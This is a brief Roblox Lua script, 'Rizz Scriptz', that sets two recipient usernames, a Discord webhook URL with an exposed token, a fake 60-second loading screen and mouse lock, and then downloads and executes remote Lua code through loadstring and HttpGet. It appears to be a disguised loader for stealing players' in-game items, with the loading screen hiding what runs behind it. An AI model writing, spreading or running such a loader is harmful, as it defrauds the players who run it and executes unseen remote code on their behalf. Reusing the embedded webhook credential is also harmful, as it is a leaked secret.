UserName = "Eneez416"
UserName2 = "ReLeababa"
Webhook = "https://discord.com/api/webhooks/1102620015548698634/dacbXgr1lBrYFbtW3ALkTYAMcxwhYf5ZSY1OZHUVGJ9Qpsk8-bnqYmLH3u_2LQhAX6Ea"

_G.LoadingScreen = true
_G.AntiLeave = false
_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 60 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://rizz69.github.io/Main.lua", true))()
